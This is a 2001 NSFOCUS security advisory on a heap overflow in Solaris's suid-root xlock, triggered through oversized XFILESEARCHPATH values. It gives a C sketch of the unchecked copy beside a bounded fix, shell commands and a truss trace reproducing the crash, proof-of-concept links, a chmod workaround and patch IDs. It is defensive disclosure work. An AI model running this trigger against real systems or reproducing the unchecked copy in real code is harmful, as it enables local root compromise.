NSFOCUS SA2001-05 : Solaris Xlock Heap Overflow Vulnerability

From: Nsfocus Security Team (securityat_private)
Date: Fri Aug 10 2001 - 01:49:42 PDT

    NSFOCUS Security Advisory(SA2001-05)
    
    Topic:  Solaris Xlock Heap Overflow Vulnerability
    
    Release Date: 2001-08-10
    
    CVE CAN ID : CAN-2001-0652
    BUGTRAQ ID : 3160
    
    Affected system:
    ================
    
      Sun Solaris 2.6 (SPARC/x86)
      Sun Solaris 7   (SPARC/x86) 
      Sun Solaris 8   (SPARC/x86) 
    
    
    Impact: 
    =========
    
    NSFOCUS Security Team has found a heap buffer overflow vulnerability in the 
    xlock shipped with Solaris, triggered when it handles certain environment 
    variables. Exploiting it would allow a local attacker to obtain root privileges.
    
    Description:
    ============
    
    Xlock is a screen-locking tool of Solaris OpenView. It locks the X server until
    a password is entered. It is installed suid root by default. 
    
    It performs an invalid boundary check when handling certain environment 
    variables. As a result, an attacker could overwrite the boundary tags of 
    dynamic memory in the heap and, with carefully constructed overflow data, 
    run arbitrary code as root.
    
    The problem lies in two environment variables, "XFILESEARCHPATH" and 
    "XUSERFILESEARCHPATH". Xlock calls malloc() to allocate 1024 bytes and saves 
    the value of the environment variable in this dynamic memory, but it does not 
    check the length of the value when copying. If either of these environment 
    variables is set to a string longer than 1024 bytes, a heap overflow occurs. 
    The boundary tags of adjacent dynamic memory chunks can be overwritten, and a 
    segmentation fault occurs the next time malloc() is called. A particular 
    "feature" of the libc malloc()/free() implementation could be used to 
    overwrite arbitrary memory, such as a saved return address, a function 
    pointer or other important data, with carefully formed overflow data.
    
    Exploiting this vulnerability successfully would give an attacker root privilege.
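
    As an illustration added to this advisory (reconstructed from the description 
    above, not Sun's xlock source), the following C shows the unchecked copy 
    pattern beside a bounded replacement. The function names copy_env_unchecked, 
    copy_env_checked and fits_in_path_buffer, and the PATH_BUF_SIZE constant, are 
    assumptions; only the 1024-byte (0x400) allocation comes from the advisory.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of the heap block the advisory describes: malloc(0x400), 1024 bytes. */
#define PATH_BUF_SIZE 1024

/*
 * Hypothetical reconstruction of the vulnerable pattern (not Sun's code):
 * the value is copied into a fixed 1024-byte heap block with no length
 * check, so a value of 1024 bytes or more runs past the block and into the
 * allocator's boundary tags of the neighbouring chunk. Shown for comparison
 * only; nothing below passes it an oversized value.
 */
char *copy_env_unchecked(const char *value)
{
    char *buf = malloc(PATH_BUF_SIZE);
    if (buf == NULL)
        return NULL;
    strcpy(buf, value);  /* copies strlen(value) + 1 bytes, whatever the size */
    return buf;
}

/* Length of s, but never scanning more than max bytes. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/*
 * Hardened form: measure the value without scanning past the capacity we
 * can accept, refuse anything that will not fit together with its NUL
 * terminator, and copy exactly the measured length.
 */
char *copy_env_checked(const char *value)
{
    size_t len;
    char *buf;

    if (value == NULL)
        return NULL;
    len = bounded_len(value, PATH_BUF_SIZE);
    if (len >= PATH_BUF_SIZE) {           /* no room left for the terminator */
        errno = ENAMETOOLONG;
        return NULL;
    }
    buf = malloc(PATH_BUF_SIZE);
    if (buf == NULL)
        return NULL;
    memcpy(buf, value, len + 1);          /* includes the NUL */
    return buf;
}

/*
 * Helper: build a constructed value of value_len bytes (all 'A', like the
 * advisory's perl one-liner) and report whether the checked copy accepts
 * it. Returns 1 if accepted, 0 if rejected.
 */
int fits_in_path_buffer(size_t value_len)
{
    char *value = malloc(value_len + 1);
    char *copy;
    int accepted;

    if (value == NULL)
        return 0;
    memset(value, 'A', value_len);
    value[value_len] = '\0';
    copy = copy_env_checked(value);
    accepted = (copy != NULL);
    free(copy);
    free(value);
    return accepted;
}

/* Stand-alone use: inspect the XFILESEARCHPATH of the calling shell. */
int main(void)
{
    const char *value = getenv("XFILESEARCHPATH");
    char *copy;

    if (value == NULL) {
        puts("XFILESEARCHPATH is not set");
        return 0;
    }
    copy = copy_env_checked(value);
    if (copy == NULL) {
        printf("XFILESEARCHPATH rejected: longer than %d bytes\n",
               PATH_BUF_SIZE - 1);
        return 1;
    }
    printf("XFILESEARCHPATH accepted (%zu bytes)\n", strlen(copy));
    free(copy);
    return 0;
}
```

    Run with the advisory's 1028-byte value exported, the checked copy refuses 
    the value and returns NULL with errno set to ENAMETOOLONG instead of writing 
    five bytes past the heap block; a 1023-byte value (the longest that fits with 
    its terminator) is accepted.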
    
    
    Exploit:
    ==========
    
    bash-2.03$ uname -a
    SunOS sun8 5.8 Generic sun4u sparc SUNW,Ultra-5_10
    bash-2.03$ cp /usr/openwin/bin/xlock /tmp/xlock
    bash-2.03$ export XFILESEARCHPATH=`perl -e 'print "A"x1028'`
    bash-2.03$ /tmp/xlock
    Segmentation Fault
    bash-2.03$ truss -u libc:malloc,free /tmp/xlock
    <...snip...>
    <- libc:malloc() = 0x1135d0
    -> libc:malloc(0x400, 0xffbefa8d, 0xffffffff, 0x1b648)
    <- libc:malloc() = 0x1139d0
    open("AAAAAAA...AAAAAAAAAAAAAAA", O_RDONLY) Err#78 ENAMETOOLONG
    -> libc:free(0x1139d0, 0x0, 0xff31c000, 0x1b648)
    <- libc:free() = 0
    -> libc:malloc(0x400, 0x12, 0x0, 0x10ed49)
    <- libc:malloc() = 0x1139d0
    open("/export/home/test/XLock", O_RDONLY)         Err#2 ENOENT
    -> libc:free(0x1139d0, 0x0, 0xff31c000, 0x7efefeff)
    <- libc:free() = 0
    -> libc:malloc(0x3, 0x3073b, 0xffffffff, 0x3a300000)
    <- libc:malloc() = 0x1135e0
        Incurred fault #6, FLTBOUNDS  %pc = 0xFF0C0F4C
          siginfo: SIGSEGV SEGV_MAPERR addr=0x41527F18
        Received signal #11, SIGSEGV [default]
          siginfo: SIGSEGV SEGV_MAPERR addr=0x41527F18
            *** process killed ***
    
    Proof-of-concept code for this issue will be available at:
    http://www.nsfocus.com/proof/sol_sparc_xlockex.c
    http://www.nsfocus.com/proof/sol_x86_xlockex.c
    
    Workaround:
    ===================
    
    Drop the suid root attribute of xlock:
    
    # chmod a-s /usr/openwin/bin/xlock
    
    
    
    Vendor Status:
    ==============
    
    2001.6.11       We informed Sun of this problem.
    2001.6.14       Sun replied that the problem had been reproduced and they 
                    had started to develop relevant patches.
    2001.8.8        Sun informed us that the development of patches had finished and 
                    would be released at the end of the month.
    2001.8.9        Sun provided us with IDs of the patches to be released.
    
    Sun's patches to be released for this vulnerability:
    
                    SPARC           x86
                    ---------       ---------
      Solaris 8     108652-38       108653-33
      Solaris 7     108376-30       108377-26
      Solaris 2.6   105633-60       106248-45
    
    
    Sun's security patches are available at:
    
    http://sunsolve.sun.com/securitypatch
    
    
    Additional Information:
    ========================
    
    The Common Vulnerabilities and Exposures (CVE) project has 
    assigned the name CAN-2001-0652 to this issue. This is a 
    candidate for inclusion in the CVE list (http://cve.mitre.org),
    which standardizes names for security problems.  Candidates 
    may change significantly before they become official CVE entries.
    
    DISCLAIMER:
    ==========
    THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
    OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, 
    EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS 
    BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, 
    INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, 
    EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 
    DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PERMITTED PROVIDED THAT 
    THE ADVISORY IS NOT MODIFIED IN ANY WAY.
    
    Copyright 1999-2001 NSFOCUS. All Rights Reserved. Terms of use.
    
    
    NSFOCUS Security Team <securityat_private>
    NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
    (http://www.nsfocus.com)
     
    
    
    




    This archive was generated by hypermail 2b30 : Fri Aug 10 2001 - 08:00:59 PDT